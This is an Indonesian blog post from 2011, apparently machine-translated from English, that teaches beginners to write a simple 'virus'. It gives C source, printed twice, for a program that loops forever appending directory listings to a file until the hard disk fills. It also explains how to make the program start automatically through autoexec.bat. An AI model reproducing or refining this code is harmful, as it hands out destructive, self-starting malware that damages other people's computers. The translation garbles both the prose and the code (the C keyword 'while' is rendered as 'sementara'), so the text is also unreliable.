Jumat, 04 Maret 2011

cara membuat virus sederhana untuk pemula

Hi semua, pada awal belajar pemrograman komputer itu adalah impian hampir semua mahasiswa untuk membangun virus komputer / nya sendiri.
virus komputer jelas adalah suatu program yang dibuat dan digunakan pada komputer lain itu benar-benar ilegal di countries.So semua membuat dan mencoba ini pada komputer Anda sendiri.
Sekarang mari saya jelaskan apa virus do.There beberapa jenis virus komputer dengan fungsi yang berbeda (destruktif jelas). Beberapa yang menghapus file penting komputer 'dan folder, beberapa perubahan konfigurasi sistem komputer Anda seperti nilai registri, beberapa menempati dan menelan sejumlah besar ruang memori dan dump pada hard disc anda beberapa virus juga dapat merusak RAM parmanently.
Saya akan berikan di sini program virus sederhana yang hanya memiliki sedikit tetapi garis memiliki kemampuan untuk kemacetan Hard disk.
Logika di balik program ini tidak lain hanyalah membuat file tumbuh diri yang tumbuh ke beberapa MB dalam satu tiga barang dan pertumbuhan ini akan terus berlanjut tidak terbatas.
Yang mengharuskan pemerintah untuk membuat virus ini


OS: -Windows98/xp/2000 MS-DOS
Kompilator:-Borland C (Yang memiliki Shell Dos)
Source Code: -
/ / START v.c
# Include <stdio.h>
# Include <stdlib.h>
void main ()
{
sementara (1)
{
system ("dir>> ╚ a.exe");
}
}
/ / END
Seperti yang anda lihat ini adalah programe.Compiling sangat sedikit program yang kami file v.exe adalah virus kita.
Bagaimana cara kerjanya?-System call "dir>> ╚ a.exe" akan mengeksekusi 'dir' perintah dos dan ridirect outputnya file Toa a.exe ╚ (╚ simbol yang dapat diperoleh dengan menekan 456 pada alt memegang kunci papan angka ) Jadi menjalankan program ini dalam sebuah folder yang memiliki banyak file dan folder akan meningkatkan ukuran a.exe ╚ dalam proses jumlah yang besar akan terus tak terhingga karena ini adalah dalam waktu (1) loop.;
Best coba ini pada win98.then Anda tidak dapat menghapus a.exe ╚ dari GUI.
Untuk otomatis berjalan v.exe tempat di folder perintah dalam folder windows.
Dalam autoexec.bat (win98) atau autoexec.NT (winXP/2000) file cukup tulis v.exe.
Setiap kali jendela Anda mulai v.exe akan berjalan secara otomatis.
Coba ini di komputer Anda sendiri ingat a.exe ╚ adalah file terinfeksi yang tumbuh di continiously.So ukuran untuk memulihkan, cukup hapus file a.exe v.exe dan ╚ dari komputer Anda.
Untuk informaton lebih atau masalah silahkan menulis saya.
Bye .... http://anirbanb2004.googlepages.com

Code:

/ / START v.c
# Include <stdio.h>
# Include <stdlib.h>
void main ()
{
sementara (1)
{
system ("dir>> ╚ a.exe");
}
}
/ / END

Tidak ada komentar:

Posting Komentar